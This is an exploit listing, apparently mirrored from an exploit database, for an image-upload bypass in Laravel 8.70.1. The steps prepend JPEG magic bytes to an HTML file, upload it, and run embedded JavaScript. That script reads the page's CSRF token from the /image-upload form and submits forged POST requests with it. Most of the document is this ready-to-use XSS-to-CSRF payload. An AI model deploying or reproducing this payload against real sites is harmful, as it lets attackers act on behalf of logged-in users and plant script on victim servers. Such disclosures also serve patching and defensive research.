Exploit for PHP Laravel 8.70.1 Cross Site Request Forgery / Cross Site Scripting

Name: Exploit for PHP Laravel 8.70.1 Cross Site Request Forgery / Cross Site Scripting
Rating: 5 (217 reviews)
2021-11-15 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:164972
# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)  
# Date: 14/11/2021  
# Exploit Author: Hosein Vita  
# Vendor Homepage: https://laravel.com/  
# Software Link: https://laravel.com/docs/4.2  
# Version: Laravel Framework 8.70.1  
# Tested on: Windows/Linux  
  
# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server  
# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b  
  
# Steps to reproduce:  
1- Use HxD tool and add FF D8 FF E0 at the very begining of your file  
2- Use code below to bypass csrf token  
  
ÿØÿà<html>  
<head>  
<title>Laravel Csrf Bypass</title>  
</head>  
<body>  
<script>  
function submitFormWithTokenJS(token) {  
var xhr = new XMLHttpRequest();  
xhr.open("POST", POST_URL, true);  
  
// Send the proper header information along with the request  
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");  
  
// This is for debugging and can be removed  
xhr.onreadystatechange = function() {  
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {  
console.log(xhr.responseText);  
}  
}  
//  
xhr.send("_token=" + token + "&desiredParameter=desiredValue");  
}  
  
function getTokenJS() {  
var xhr = new XMLHttpRequest();  
// This tels it to return it as a HTML document  
xhr.responseType = "document";  
// true on the end of here makes the call asynchronous  
//Edit the path as you want  
xhr.open("GET", "/image-upload", true);  
xhr.onload = function (e) {  
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {  
// Get the document from the response  
page = xhr.response  
// Get the input element  
input = page.getElementsByTagName("input")[0];  
// Show the token  
alert("The token is: " + input.value);  
// Use the token to submit the form  
submitFormWithTokenJS(input.value);  
}  
};  
// Make the request  
xhr.send(null);  
}  
getTokenJS();  
  
var POST_URL="/"  
getTokenJS();  
  
</script>  
</html>  
  
3- Save it as Html file and upload it.